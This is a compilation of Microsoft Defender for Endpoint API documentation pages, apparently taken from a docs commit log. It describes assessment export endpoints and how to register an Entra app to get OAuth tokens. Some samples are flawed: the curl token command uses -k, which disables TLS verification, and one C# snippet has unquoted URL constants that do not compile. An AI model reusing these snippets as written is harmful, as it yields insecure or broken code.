-## 2. Export hardware and firmware assessment (via files)
-
-### 2.1 API method description
-
-Returns all hardware and firmware assessments for all devices, on a per-device basis. It returns a table with a separate entry for every unique combination of DeviceId, ComponentType and ComponentName.
-
-#### 2.1.1 Limitations
--- Rate limitations for this API are 5 calls per minute and 20 calls per hour.-
-### 2.2 Permissions
-
-One of the following permissions is required to call this API. To learn more, including how to choose permissions, see [Use Microsoft Defender for Endpoint APIs for details.](apis-intro.md)
-
-Permission type|Permission|Permission display name
-:|:|:
-Application|Software.Read.All|'Read Threat and Vulnerability Management software information'
-Delegated (work or school account)|Software.Read|'Read Threat and Vulnerability Management software information'
-
-### 2.3 URL
-
-```http
-GET /api/machines/HardwareFirmwareInventoryExport
-```
-
-### 2.4 Parameters
--- sasValidHours: The number of hours that the download URLs will be valid for (Maximum 24 hours).-
-### 2.5 Properties (JSON response)
-
-> [!NOTE]
-> The files are gzip compressed & in multiline Json format.
->
-> The download URLs are only valid for 3 hours; otherwise, you can use the parameter.
->
-> To maximize download speeds, make sure you are downloading the data from the same Azure region where your data resides.
->
-> Each record is approximately 1KB of data. You should take this into account when choosing the pageSize parameter that works for you.
->
-> Some additional columns might be returned in the response. These columns are temporary and might be removed. Only use the documented columns.
-
-Property (ID)|Data type|Description
-:|:|:
-|Export files|String[array]|A list of download URLs for files holding the current snapshot of the organization.
-|GeneratedTime|DateTime|The time the export was generated.
---
-## 2.6 Example
-
-### 2.6.1 Request example
-
-```http
-GET https://api.security.microsoft.com/api/machines/HardwareFirmwareInventoryExport
-```
-
-### 2.6.2 Response example
-
-```json
- {
- "@odata.context":"https://api-df.securitycenter.microsoft.com/api/$metadata#microsoft.windowsDefenderATP.api.ExportFilesResponse",
- "exportFiles": [
- "https://tvmexportstrprdcane.blob.core.windows.net/tvm-firmware-export/2022-07-11/1101/FirmwareHardwareExport/json/OrgId=d7c7c745-195f-4223-9c7a-99fb420fd000/_RbacGroupId=39/part-00999-71eea973-1bb1-4d0a-829d-80cb07aff5d8.c000.json.gz?sv=2020-08-04&st=2022-07-11T13%3A10%3A06Z&se=2022-07-11T16%3A10%3A06Z&sr=b&sp=r&sig=muN8Sq6rVN6bFMtR0u3S5Wzh3D9qNPgN5vpU7lWvULg%3D",
- "https://tvmexportstrprdcane.blob.core.windows.net/tvm-firmware-export/2022-07-11/1101/FirmwareHardwareExport/json/OrgId=d7c7c745-195f-4223-9c7a-99fb420fd000/_RbacGroupId=9/part-00968-71eea973-1bb1-4d0a-829d-80cb07aff5d8.c000.json.gz?sv=2020-08-04&st=2022-07-11T13%3A10%3A06Z&se=2022-07-11T16%3A10%3A06Z&sr=b&sp=r&sig=%2BA0%2B4qOOBCS5E4UenJPbMdLM%2FkbXHnz%2F1pvfSOCq%2F2s%3D",
- "https://tvmexportstrprdcane.blob.core.windows.net/tvm-firmware-export/2022-07-11/1101/FirmwareHardwareExport/json/OrgId=d7c7c745-195f-4223-9c7a-99fb420fd000/_RbacGroupId=9/part-00969-71eea973-1bb1-4d0a-829d-80cb07aff5d8.c000.json.gz?sv=2020-08-04&st=2022-07-11T13%3A10%3A06Z&se=2022-07-11T16%3A10%3A06Z&sr=b&sp=r&sig=sZUgYMwSr5zk6BZvS%2BoYIWlHJWk2oJ7YjiC8R26S1X4%3D"
- ],
- "generatedTime": "2022-07-11T11:01:00Z"
-
- }
-```
security Export Security Baseline Assessment https://github.com/MicrosoftDocs/microsoft-365-docs/commits/public/microsoft-365/security/defender-endpoint/api/export-security-baseline-assessment.md
- Title: Security baseline assessment methods and properties per device
-description: Provides information about the security baselines APIs that pull "Microsoft Defender Vulnerability Management" data. There are different API calls to get different types of data. In general, each API call contains the requisite data for devices in your organization.
------- m365-security-- tier3-- must-keep--- Previously updated : 05/02/2022--
-# Export security baselines assessment per device
--
-**Applies to:**
--- [Microsoft Defender for Endpoint Plan 1](https://go.microsoft.com/fwlink/?linkid=2154037)-- [Microsoft Defender for Endpoint Plan 2](https://go.microsoft.com/fwlink/?linkid=2154037)-- [Microsoft Defender Vulnerability Management](../../defender-vulnerability-management/index.yml)-- [Microsoft Defender XDR](https://go.microsoft.com/fwlink/?linkid=2118804)-
-> Want to experience Microsoft Defender Vulnerability Management? Learn more about how you can sign up to the [Microsoft Defender Vulnerability Management public preview trial](../../defender-vulnerability-management/get-defender-vulnerability-management.md).
-
-There are different API calls to get different types of data. In general, each API call contains the requisite data for devices in your organization.
--- **JSON response** The API pulls all data in your organization as JSON responses. This method is best for _small organizations with less than 100-K devices_. The response is paginated, so you can use the \@odata.nextLink field from the response to fetch the next results.--- **via files** This API solution enables pulling larger amounts of data faster and more reliably. So, it's recommended for large organizations, with more than 100-K devices. This API pulls all data in your organization as download files. The response contains URLs to download all the data from Azure Storage. You can download data from Azure Storage as follows:
- - Call the API to get a list of download URLs with all your organization data.
- - Download all the files using the download URLs and process the data as you like.
-
-Data that is collected using either '_JSON response_ or _via files_' is the current snapshot of the current state. It doesn't contain historic data. To collect historic data, customers must save the data in their own data storages.
-
-> [!NOTE]
-> Unless indicated otherwise, all export security baseline assessment methods listed are **_full export_** and **_by device_** (also referred to as **_per device_**)
-
-## 1. Export security baselines assessment (JSON response)
-
-### 1.1 API method description
-
-Returns all security baselines assessments for all devices, on a per-device basis. It returns a table with a separate entry for every unique combination of DeviceId, ProfileId, ConfigurationId.
-
-### 1.2 Permissions
-
-One of the following permissions is required to call this API. To learn more, including how to choose permissions, see [Use Microsoft Defender for Endpoint APIs](apis-intro.md) for details.
-
-Permission type|Permission|Permission display name
-:|:|:
-Application|SecurityBaselinesAssessment.Read.All |'Read all security baselines assessments information'
-Delegated (work or school account)|SecurityBaselinesAssessment.Read|'Read security baselines assessments information'
-
-### 1.3 Limitations
--- Maximum page size is 200,000.-- Rate limitations for this API are 30 calls per minute and 1000 calls per hour.-
-### 1.4 Parameters
--- pageSize (default = 50,000): Number of results in response.-- $top: Number of results to return (doesn't return @odata.nextLink and so doesn't pull all the data).-
-### 1.5 HTTP request
-
-```http
-GET /api/machines/baselineComplianceAssessmentByMachine
-```
-
-### 1.6 Properties (JSON response)
-
-> [!NOTE]
-> Each record is approximately 1 KB of data. You should take this into account when choosing the correct pageSize parameter.
->
-> Some additional columns might be returned in the response. These columns are temporary and might be removed. Only use the documented columns.
->
-> The properties defined in the following table are listed alphabetically by property ID. When running this API, the resulting output will not necessarily be returned in the same order listed in this table.
-
-Property (ID)|Data type|Description
-:|:|:
-|configurationId|String|Unique identifier for a specific configuration in the baseline benchmark.
-|profileId|String|Unique identifier for the profile assessed.
-|deviceId|String|Unique identifier for the device in the service.
-|deviceName|String|Fully qualified domain name (FQDN) of the device.
-|isApplicable|Boolean|Indicates whether the configuration is applicable to this device.
-|isCompliant|Boolean|Indicates whether the device is compliant with configuration.
-|id|String|Unique identifier for the record, which is a combination of DeviceId, ProfileId, and ConfigurationId.
-|osVersion|String|Specific version of the operating system running on the device.
-|osPlatform|String|Operating system platform running on the device. Specific operating systems with variations within the same family, such as Windows 10 and Windows 11. See [MDVM supported operating systems and platforms](../tvm-supported-os.md) for details.
-|rbacGroupId|Int|The role-based access control (RBAC) group Id. If the device isn't assigned to any RBAC group, the value will be "Unassigned." If the organization doesn't contain any RBAC groups, the value will be "None."
-|rbacGroupName|String|The role-based access control (RBAC) group. If the device isn't assigned to any RBAC group, the value will be "Unassigned." If the organization doesn't contain any RBAC groups, the value will be "None."
-|DataCollectionTimeOffset|DateTime|The time the data was collected from the device. This field may not appear if no data was collected.
-|ComplianceCalculationTimeOffset|DateTime|The time the assessment calculation was made.
-|RecommendedValue|String|Set of expected values for the current device setting to be complaint.
-|CurrentValue|String|Set of detected values found on the device.
-|Source|String|The registry path or other location used to determine the current device setting.
-
-## 1.7 Example
-
-### 1.7.1 Request example
-
-```http
-GET https://api.securitycenter.microsoft.com/api/machines/BaselineComplianceAssessmentByMachine
-```
-
-### 1.7.2 Response example
-
-```json
-{
-"@odata.context": " https://api.securitycenter.microsoft.com /api/$metadata#Collection(microsoft.windowsDefenderATP.api.AssetBaselineAssessment)",
-"value": [
-{
- "id": "0000682575d5d473e82ed4d8680425d152411251_9e1b90be-e83e-485b-a5ec-4a429412e734_1.1.1",
- "configurationId": "1.1.1",
- "deviceId": "0000682575d5d473242222425d152411251",
- "deviceName": " ComputerPII_365f5c0bb7202c163937dad3d017969b2d760eb4.DomainPII_29596 ",
- "profileId": "9e1b90be-e83e-485b-a5ec-4a429412e734",
- "osPlatform": "WindowsServer2019",
- "osVersion": "10.0.17763.2330",
- "rbacGroupId": 86,
- "rbacGroupName": "UnassignedGroup",
- "isApplicable": true,
- "isCompliant": false,
- "dataCollectionTimeOffset": "2021-12-22T00:08:02.478Z",
- "recommendedValue": [
- "Greater than or equal '24'"
- ],
- "currentValue": [
- "24"
- ],
- "source": [
- "password_hist_len"
- ],
-}
-```
-
-## 2. Export security baselines assessment (via files)
-
-### 2.1 API method description
-
-Returns all security baselines assessments for all devices, on a per-device basis. It returns a table with a separate entry for every unique combination of DeviceId, ProfileId, ConfigurationId.
-
-### 2.2 Limitations
--- Rate limitations for this API are 5 calls per minute and 20 calls per hour.-
-### 2.3 URL
-
-```http
-GET /api/machines/BaselineComplianceAssessmentExport
-```
-
-### 2.4 Parameters
--- sasValidHours: The number of hours that the download URLs will be valid for (Maximum 24 hours).-
-### 2.5 Properties (via files)
-
-> [!NOTE]
-> The files are gzip compressed & in multiline Json format.
->
-> The download URLs are only valid for 3 hours; otherwise you can use the parameter.
->
-> To maximize download speeds, make sure you are downloading the data from the same Azure region where your data resides.
->
-> Some additional columns might be returned in the response. These columns are temporary and might be removed. Only use the documented columns.
-
-Property (ID)|Data type|Description
-:|:|:
-|Export files|array[string]|A list of download URLs for files holding the current snapshot of the organization.
-|GeneratedTime|String|The time that the export was generated.
-
-## 2.6 Example
-
-### 2.6.1 Request example
-
-```http
-GET https://api.securitycenter.microsoft.com/api/machines/BaselineComplianceAssessmentExport
-```
-
-### 2.6.2 Response example
-
-```json
-{
- "@odata.context": "https://api.securitycenter. contoso.com/api/$metadata#microsoft.windowsDefenderATP.api.ExportFilesResponse",
- "exportFiles":
- [
- "https://tvmexportexternalstgeus.blob.core.windows.net/temp-1ebd3d09-d06a-4aad-ab80-ebc536cec61c/2021-12-22/0500/BaselineAssessmentExport/json/OrgId= OrgId=<Org Id>/_RbacGroupId=<Rbac Group Id>/part-00000-c09dfd00-2278-4735-b23a-71733751fcbc.c000.json.gz?sv=ABCD",
- "https://tvmexportexternalstgeus.blob.core.windows.net/temp-1ebd3d09-d06a-4aad-ab80-ebc536cec61c/2021-12-22/0500/BaselineAssessmentExport/json/OrgId=<Org Id>/_RbacGroupId=<Rbac Group Id>/part-00001-c09dfd00-2278-4735-b23a-71733751fcbc.c000.json.gz?sv= ABCD",
- ],
- "generatedTime": "2021-01-11T11:01:00Z"
-}
-```
-
-## See also
--- [Get security baselines assessment profiles](get-security-baselines-assessment-profiles.md)-- [Get security baselines assessment configurations](get-security-baselines-assessment-configurations.md)
security Exposed Apis Create App Nativeapp https://github.com/MicrosoftDocs/microsoft-365-docs/commits/public/microsoft-365/security/defender-endpoint/api/exposed-apis-create-app-nativeapp.md
- Title: Use Microsoft Defender for Endpoint APIs-
-description: Learn how to design a native Windows app to get programmatic access to Microsoft Defender for Endpoint without a user.
--- Previously updated : 01/25/2023---- m365-security-- tier3-- must-keep-----
-# Use Microsoft Defender for Endpoint APIs
---
-**Applies to:**
--- [Microsoft Defender for Endpoint Plan 1](https://go.microsoft.com/fwlink/?linkid=2154037)-- [Microsoft Defender for Endpoint Plan 2](https://go.microsoft.com/fwlink/?linkid=2154037)-- [Microsoft Defender for Business](../../defender-business/index.yml)-
-> [!IMPORTANT]
-> Advanced hunting capabilities are not included in Defender for Business.
--
-> Want to experience Microsoft Defender for Endpoint? [Sign up for a free trial.](https://signup.microsoft.com/create-account/signup?products=7f379fee-c4f9-4278-b0a1-e4c8c2fcdf7e&ru=https://aka.ms/MDEp2OpenTrial?ocid=docs-wdatp-exposedapis-abovefoldlink)
---
-This page describes how to create an application to get programmatic access to Defender for Endpoint on behalf of a user.
-
-If you need programmatic access Microsoft Defender for Endpoint without a user, refer to [Access Microsoft Defender for Endpoint with application context](exposed-apis-create-app-webapp.md).
-
-If you are not sure which access you need, read the [Introduction page](apis-intro.md).
-
-Microsoft Defender for Endpoint exposes much of its data and actions through a set of programmatic APIs. Those APIs will enable you to automate work flows and innovate based on Microsoft Defender for Endpoint capabilities. The API access requires OAuth2.0 authentication. For more information, see [OAuth 2.0 Authorization Code Flow](/azure/active-directory/develop/active-directory-v2-protocols-oauth-code).
-
-In general, you'll need to take the following steps to use the APIs:
--- Create a Microsoft Entra application-- Get an access token using this application-- Use the token to access Defender for Endpoint API-
-This page explains how to create a Microsoft Entra application, get an access token to Microsoft Defender for Endpoint and validate the token.
-
-> [!NOTE]
-> When accessing Microsoft Defender for Endpoint API on behalf of a user, you will need the correct Application permission and user permission.
-> If you are not familiar with user permissions on Microsoft Defender for Endpoint, see [Manage portal access using role-based access control](../rbac.md).
-
-> [!TIP]
-> If you have the permission to perform an action in the portal, you have the permission to perform the action in the API.
-
-## Create an app
-
-1. Log on to [Azure](https://portal.azure.com) with a user account that has the **Global Administrator** role.
-
-2. Navigate to **Microsoft Entra ID** \> **App registrations** \> **New registration**.
-
- :::image type="content" source="../media/atp-azure-new-app2.png" alt-text="The App registrations page in the Microsoft Azure portal" lightbox="../media/atp-azure-new-app2.png":::
-
-3. When the **Register an application** page appears, enter your application's registration information:
- - **Name** - Enter a meaningful application name that will be displayed to users of the app.
- - **Supported account types** - Select which accounts you would like your application to support.
-
- <br>
-
- |Supported account types|Description|
- |||
- |**Accounts in this organizational directory only**|Select this option if you're building a line-of-business (LOB) application. This option is not available if you're not registering the application in a directory. <p> This option maps to Microsoft Entra-only single-tenant. <p> This is the default option unless you're registering the app outside of a directory. In cases where the app is registered outside of a directory, the default is Microsoft Entra multi-tenant and personal Microsoft accounts.|
- |**Accounts in any organizational directory**|Select this option if you would like to target all business and educational customers. <p> This option maps to a Microsoft Entra-only multi-tenant. <p> If you registered the app as Microsoft Entra-only single-tenant, you can update it to be Microsoft Entra multi-tenant and back to single-tenant through the **Authentication** blade.|
- |**Accounts in any organizational directory and personal Microsoft accounts**|Select this option to target the widest set of customers. <p> This option maps to Microsoft Entra multi-tenant and personal Microsoft accounts. <p> If you registered the app as Microsoft Entra multi-tenant and personal Microsoft accounts, you cannot change this in the UI. Instead, you must use the application manifest editor to change the supported account types.|
-
- - **Redirect URI (optional)** - Select the type of app you're building, **Web** or **Public client (mobile & desktop)**, and then enter the redirect URI (or reply URL) for your application.
-
- - For web applications, provide the base URL of your app. For example, `http://localhost:31544` might be the URL for a web app running on your local machine. Users would use this URL to sign in to a web client application.
-
- - For public client applications, provide the URI used by Microsoft Entra ID to return token responses. Enter a value specific to your application, such as `myapp://auth`.
-
- To see specific examples for web applications or native applications, check out our [quickstarts](/azure/active-directory/develop/#quickstarts).
-
- When finished, select **Register**.
-
-4. Allow your Application to access Microsoft Defender for Endpoint and assign it 'Read alerts' permission:
-
- - On your application page, select **API Permissions** \> **Add permission** \> **APIs my organization uses** > type **WindowsDefenderATP** and select on **WindowsDefenderATP**.
-
- > [!NOTE]
- > *WindowsDefenderATP* does not appear in the original list. Start writing its name in the text box to see it appear.
-
- :::image type="content" alt-text="add permission." source="../media/add-permission.png" lightbox="../media/add-permission.png":::
-
- - Choose **Delegated permissions** \> **Alert.Read** > select **Add permissions**.
-
- :::image type="content" source="../media/application-permissions-public-client.png" alt-text="The application type and permissions panes" lightbox="../media/application-permissions-public-client.png":::
-
- > [!IMPORTANT]
- > Select the relevant permissions. Read alerts is only an example.
-
- For example:
-
- - To [run advanced queries](run-advanced-query-api.md), select **Run advanced queries** permission.
- - To [isolate a device](isolate-machine.md), select **Isolate machine** permission.
- - To determine which permission you need, view the **Permissions** section in the API you are interested to call.
-
- - Select **Grant consent**.
-
- > [!NOTE]
- > Every time you add permission you must select on **Grant consent** for the new permission to take effect.
-
- :::image type="content" source="../media/grant-consent.png" alt-text="The Grand admin consent option" lightbox="../media/grant-consent.png":::
-
-5. Write down your application ID and your tenant ID.
-
- On your application page, go to **Overview** and copy the following information:
-
- :::image type="content" source="../media/app-and-tenant-ids.png" alt-text="The created app ID" lightbox="../media/app-and-tenant-ids.png":::
-
-## Get an access token
-
-For more information on Microsoft Entra tokens, see [Microsoft Entra tutorial](/azure/active-directory/develop/active-directory-v2-protocols-oauth-client-creds).
-
-### Using C\#
--- Copy/Paste the below class in your application.-- Use **AcquireUserTokenAsync** method with your application ID, tenant ID, user name, and password to acquire a token.-
- ```csharp
- namespace WindowsDefenderATP
- {
- using System.Net.Http;
- using System.Text;
- using System.Threading.Tasks;
- using Newtonsoft.Json.Linq;
-
- public static class WindowsDefenderATPUtils
- {
- private const string Authority = "https://login.microsoftonline.com";
-
- private const string WdatpResourceId = "https://api.securitycenter.microsoft.com";
-
- public static async Task<string> AcquireUserTokenAsync(string username, string password, string appId, string tenantId)
- {
- using (var httpClient = new HttpClient())
- {
- var urlEncodedBody = $"resource={WdatpResourceId}&client_id={appId}&grant_type=password&username={username}&password={password}";
-
- var stringContent = new StringContent(urlEncodedBody, Encoding.UTF8, "application/x-www-form-urlencoded");
-
- using (var response = await httpClient.PostAsync($"{Authority}/{tenantId}/oauth2/token", stringContent).ConfigureAwait(false))
- {
- response.EnsureSuccessStatusCode();
-
- var json = await response.Content.ReadAsStringAsync().ConfigureAwait(false);
-
- var jObject = JObject.Parse(json);
-
- return jObject["access_token"].Value<string>();
- }
- }
- }
- }
- }
- ```
-
-## Validate the token
-
-Verify to make sure you got a correct token:
--- Copy/paste into [JWT](https://jwt.ms) the token you got in the previous step in order to decode it.-- Validate you get a 'scp' claim with the desired app permissions.-- In the screenshot below you can see a decoded token acquired from the app in the tutorial:-
- :::image type="content" source="../media/nativeapp-decoded-token.png" alt-text="The token validation page" lightbox="../media/nativeapp-decoded-token.png":::
-
-## Use the token to access Microsoft Defender for Endpoint API
--- Choose the API you want to use - [Supported Microsoft Defender for Endpoint APIs](exposed-apis-list.md).-- Set the Authorization header in the HTTP request you send to "Bearer {token}" (Bearer is the Authorization scheme).-- The Expiration time of the token is 1 hour (you can send more than one request with the same token).--- Example of sending a request to get a list of alerts **using C#**:-
- ```csharp
- var httpClient = new HttpClient();
-
- var request = new HttpRequestMessage(HttpMethod.Get, "https://api.securitycenter.microsoft.com/api/alerts");
-
- request.Headers.Authorization = new AuthenticationHeaderValue("Bearer", token);
-
- var response = httpClient.SendAsync(request).GetAwaiter().GetResult();
-
- // Do something useful with the response
- ```
-
-## See also
--- [Microsoft Defender for Endpoint APIs](exposed-apis-list.md)-- [Access Microsoft Defender for Endpoint with application context](exposed-apis-create-app-webapp.md)
security Exposed Apis Create App Partners https://github.com/MicrosoftDocs/microsoft-365-docs/commits/public/microsoft-365/security/defender-endpoint/api/exposed-apis-create-app-partners.md
- Title: Partner access through Microsoft Defender for Endpoint APIs-
-description: Learn how to design a web app to get programmatic access to Microsoft Defender for Endpoint on behalf of your users.
--- Previously updated : 01/25/2023---- m365-security-- tier3-- must-keep-----
-# Partner access through Microsoft Defender for Endpoint APIs
---
-**Applies to:**
--- [Microsoft Defender for Endpoint Plan 1](https://go.microsoft.com/fwlink/?linkid=2154037)-- [Microsoft Defender for Endpoint Plan 2](https://go.microsoft.com/fwlink/?linkid=2154037)-- [Microsoft Defender for Business](../../defender-business/index.yml)-
-> [!IMPORTANT]
-> Advanced hunting capabilities are not included in Defender for Business.
--
-> Want to experience Microsoft Defender for Endpoint? [Sign up for a free trial.](https://signup.microsoft.com/create-account/signup?products=7f379fee-c4f9-4278-b0a1-e4c8c2fcdf7e&ru=https://aka.ms/MDEp2OpenTrial?ocid=docs-wdatp-exposedapis-abovefoldlink)
---
-This page describes how to create a Microsoft Entra application to get programmatic access to Microsoft Defender for Endpoint on behalf of your customers.
-
-Microsoft Defender for Endpoint exposes much of its data and actions through a set of programmatic APIs. Those APIs help you automate work flows and innovate based on Microsoft Defender for Endpoint capabilities. The API access requires OAuth2.0 authentication. For more information, see [OAuth 2.0 Authorization Code Flow](/azure/active-directory/develop/active-directory-v2-protocols-oauth-code).
-
-In general, you need to take the following steps to use the APIs:
--- Create a **multi-tenant** Microsoft Entra application.-- Get authorized(consent) by your customer administrator for your application to access Defender for Endpoint resources it needs.-- Get an access token using this application.-- Use the token to access Microsoft Defender for Endpoint API.-
-The following steps guide you how to create a Microsoft Entra application, get an access token to Microsoft Defender for Endpoint and validate the token.
-
-## Create the multitenant app
-
-1. Sign in to your [Azure tenant](https://portal.azure.com) with user that has **Global Administrator** role.
-
-2. Navigate to **Microsoft Entra ID** \> **App registrations** \> **New registration**.
-
- :::image type="content" source="../media/atp-azure-new-app2.png" alt-text="The navigation to application registration pane" lightbox="../media/atp-azure-new-app2.png":::
-
-3. In the registration form:
-
- - Choose a name for your application.
-
- - Supported account types - accounts in any organizational directory.
-
- - Redirect URI - type: Web, URI: https://portal.azure.com
-
- :::image type="content" source="../media/atp-api-new-app-partner.png" alt-text="The Microsoft Azure partner application registration page" lightbox="../media/atp-api-new-app-partner.png":::
-
-4. Allow your Application to access Microsoft Defender for Endpoint and assign it with the minimal set of permissions required to complete the integration.
-
- - On your application page, select **API Permissions** \> **Add permission** \> **APIs my organization uses** > type **WindowsDefenderATP** and select on **WindowsDefenderATP**.
-
- - Note that *WindowsDefenderATP* doesn't appear in the original list. Start writing its name in the text box to see it appear.
-
- :::image type="content" source="../media/add-permission.png" alt-text="The Add a permission option" lightbox="../media/add-permission.png":::
-
-### Request API permissions
-
-To determine which permission you need, review the **Permissions** section in the API you're interested to call. For instance:
--- To [run advanced queries](run-advanced-query-api.md), select 'Run advanced queries' permission-- To [isolate a device](isolate-machine.md), select 'Isolate machine' permission-
-In the following example we use **'Read all alerts'** permission:
-
-1. Choose **Application permissions** \> **Alert.Read.All** > select on **Add permissions**
-
- :::image type="content" source="../media/application-permissions.png" alt-text="The option that allows to add a permission" lightbox="../media/application-permissions.png":::
-
-2. Select **Grant consent**
-
- - **Note**: Every time you add permission you must select on **Grant consent** for the new permission to take effect.
-
- :::image type="content" source="../media/grant-consent.png" alt-text="The option that allows consent to be granted" lightbox="../media/grant-consent.png":::
-
-3. Add a secret to the application.
-
- - Select **Certificates & secrets**, add description to the secret and select **Add**.
-
- **Important**: After you select **Add**, make sure to copy the generated secret value. You won't be able to retrieve it after you leave!
-
- :::image type="content" source="../media/webapp-create-key2.png" alt-text="The create app key" lightbox="../media/webapp-create-key2.png":::
-
-4. Write down your application ID:
-
- - On your application page, go to **Overview** and copy the following information:
-
- :::image type="content" source="../media/app-id.png" alt-text="The create application's ID" lightbox="../media/app-id.png":::
-
-5. Add the application to your customer's tenant.
-
- You need your application to be approved in each customer tenant where you intend to use it. This approval is necessary because your application interacts with Microsoft Defender for Endpoint application on behalf of your customer.
-
- A user with **Global Administrator** from your customer's tenant need to select the consent link and approve your application.
-
- Consent link is of the form:
-
- ```http
- https://login.microsoftonline.com/common/oauth2/authorize?prompt=consent&client_id=00000000-0000-0000-0000-000000000000&response_type=code&sso_reload=true
- ```
-
- Where 00000000-0000-0000-0000-000000000000 should be replaced with your Application ID
-
- After clicking on the consent link, sign in with the Global Administrator of the customer's tenant and consent the application.
-
- :::image type="content" source="../media/app-consent-partner.png" alt-text="The Accept button" lightbox="../media/app-consent-partner.png":::
-
- In addition, you'll need to ask your customer for their tenant ID and save it for future use when acquiring the token.
-
-6. **Done!** You successfully registered an application! See the following examples for token acquisition and validation.
-
-## Get an access token example
-
-**Note:** To get access token on behalf of your customer, use the customer's tenant ID on the following token acquisitions.
-
-For more information on Microsoft Entra token, see [Microsoft Entra tutorial](/azure/active-directory/develop/active-directory-v2-protocols-oauth-client-creds).
-
-### Using PowerShell
-
-```powershell
-# That code gets the App Context Token and save it to a file named "Latest-token.txt" under the current directory
-# Paste below your Tenant ID, App ID and App Secret (App key).
-
-$tenantId = '' ### Paste your tenant ID here
-$appId = '' ### Paste your Application ID here
-$appSecret = '' ### Paste your Application key here
-
-$resourceAppIdUri = 'https://api.securitycenter.microsoft.com'
-$oAuthUri = "https://login.microsoftonline.com/$TenantId/oauth2/token"
-$authBody = [Ordered] @{
- resource = "$resourceAppIdUri"
- client_id = "$appId"
- client_secret = "$appSecret"
- grant_type = 'client_credentials'
-}
-$authResponse = Invoke-RestMethod -Method Post -Uri $oAuthUri -Body $authBody -ErrorAction Stop
-$token = $authResponse.access_token
-Out-File -FilePath "./Latest-token.txt" -InputObject $token
-return $token
-```
-
-### Using C#
-
-> The below code was tested with Nuget Microsoft.Identity.Client
-
-> [!IMPORTANT]
-> The [Microsoft.IdentityModel.Clients.ActiveDirectory](https://www.nuget.org/packages/Microsoft.IdentityModel.Clients.ActiveDirectory) NuGet package and Azure AD Authentication Library (ADAL) have been deprecated. No new features have been added since June 30, 2020. We strongly encourage you to upgrade, see the [migration guide](/azure/active-directory/develop/msal-migration) for more details.
--- Create a new Console Application-- Install NuGet [Microsoft.Identity.Client](https://www.nuget.org/packages/Microsoft.Identity.Client/)-- Add the below using-
- ```console
- using Microsoft.Identity.Client;
- ```
--- Copy/Paste the below code in your application (don't forget to update the three variables: `tenantId`, `appId`, and `appSecret`)-
- ```csharp
- string tenantId = "00000000-0000-0000-0000-000000000000"; // Paste your own tenant ID here
- string appId = "11111111-1111-1111-1111-111111111111"; // Paste your own app ID here
- string appSecret = "22222222-2222-2222-2222-222222222222"; // Paste your own app secret here for a test, and then store it in a safe place!
- const string authority = https://login.microsoftonline.com;
- const string audience = https://api.securitycenter.microsoft.com;
-
- IConfidentialClientApplication myApp = ConfidentialClientApplicationBuilder.Create(appId).WithClientSecret(appSecret).WithAuthority($"{authority}/{tenantId}").Build();
-
- List<string> scopes = new List<string>() { $"{audience}/.default" };
-
- AuthenticationResult authResult = myApp.AcquireTokenForClient(scopes).ExecuteAsync().GetAwaiter().GetResult();
-
- string token = authResult.AccessToken;
- ```
-
-### Using Python
-
-Refer to [Get token using Python](run-advanced-query-sample-python.md#get-token).
-
-### Using Curl
-
-> [!NOTE]
-> The below procedure supposed Curl for Windows is already installed on your computer
-
-1. Open a command window.
-
-2. Set CLIENT_ID to your Azure application ID.
-
-3. Set CLIENT_SECRET to your Azure application secret.
-
-4. Set TENANT_ID to the Azure tenant ID of the customer that wants to use your application to access Microsoft Defender for Endpoint application.
-
-5. Run the following command:
-
- ```curl
- curl -i -X POST -H "Content-Type:application/x-www-form-urlencoded" -d "grant_type=client_credentials" -d "client_id=%CLIENT_ID%" -d "scope=https://securitycenter.onmicrosoft.com/windowsatpservice/.default" -d "client_secret=%CLIENT_SECRET%" "https://login.microsoftonline.com/%TENANT_ID%/oauth2/v2.0/token" -k
- ```
-
- You get an answer of the form:
-
- ```console
- {"token_type":"Bearer","expires_in":3599,"ext_expires_in":0,"access_token":"eyJ0eXAiOiJKV1QiLCJhbGciOiJSUzI1NiIsIn <truncated> aWReH7P0s0tjTBX8wGWqJUdDA"}
- ```
-
-## Validate the token
-
-Confirm you received a correct token.
-
-1. Copy/paste into [JWT](https://jwt.ms) the token you get in the previous step in order to decode it.
-
-2. Confirm you get a 'roles' claim with the desired permissions.
-
- In the following screenshot, you can see a decoded token acquired from an Application with multiple permissions to Microsoft Defender for Endpoint:
-
- The "tid" claim is the tenant ID the token belongs to.
-
- :::image type="content" source="../media/webapp-decoded-token.png" alt-text="The token validation page" lightbox="../media/webapp-decoded-token.png":::
-
-## Use the token to access Microsoft Defender for Endpoint API
-
-1. Choose the API you want to use. For more information, see [Supported Microsoft Defender for Endpoint APIs](exposed-apis-list.md).
-
-2. Set the Authorization header in the Http request you send to "Bearer {token}" (Bearer is the Authorization scheme). The Expiration time of the token is 1 hour (you can send more than one request with the same token).
-
- Here's an example of sending a request to get a list of alerts **using C#**
-
- ```csharp
- var httpClient = new HttpClient();
-
- var request = new HttpRequestMessage(HttpMethod.Get, "https://api.securitycenter.microsoft.com/api/alerts");
-
- request.Headers.Authorization = new AuthenticationHeaderValue("Bearer", token);
-
- var response = httpClient.SendAsync(request).GetAwaiter().GetResult();
-
- // Do something useful with the response
- ```
-
-## See also
--- [Supported Microsoft Defender for Endpoint APIs](exposed-apis-list.md)-- [Access Microsoft Defender for Endpoint on behalf of a user](exposed-apis-create-app-nativeapp.md)-
security Exposed Apis Create App Webapp https://github.com/MicrosoftDocs/microsoft-365-docs/commits/public/microsoft-365/security/defender-endpoint/api/exposed-apis-create-app-webapp.md
- Title: Create an app to access Microsoft Defender for Endpoint without a user-
-description: Learn how to design a web app to get programmatic access to Microsoft Defender for Endpoint without a user.
--- Previously updated : 03/19/2024---- m365-security-- tier3-- must-keep-----
-# Create an app to access Microsoft Defender for Endpoint without a user
---
-**Applies to:**
--- [Microsoft Defender for Endpoint Plan 1](https://go.microsoft.com/fwlink/?linkid=2154037)-- [Microsoft Defender for Endpoint Plan 2](https://go.microsoft.com/fwlink/?linkid=2154037)-- [Microsoft Defender for Business](../../defender-business/index.yml)-
-> [!IMPORTANT]
-> Advanced hunting capabilities are not included in Defender for Business.
--
-> Want to experience Microsoft Defender for Endpoint? [Sign up for a free trial.](https://signup.microsoft.com/create-account/signup?products=7f379fee-c4f9-4278-b0a1-e4c8c2fcdf7e&ru=https://aka.ms/MDEp2OpenTrial?ocid=docs-wdatp-exposedapis-abovefoldlink)
---
-This page describes how to create an application to get programmatic access to Defender for Endpoint without a user. If you need programmatic access to Defender for Endpoint on behalf of a user, see [Get access with user context](exposed-apis-create-app-nativeapp.md). If you are not sure which access you need, see [Get started](apis-intro.md).
-
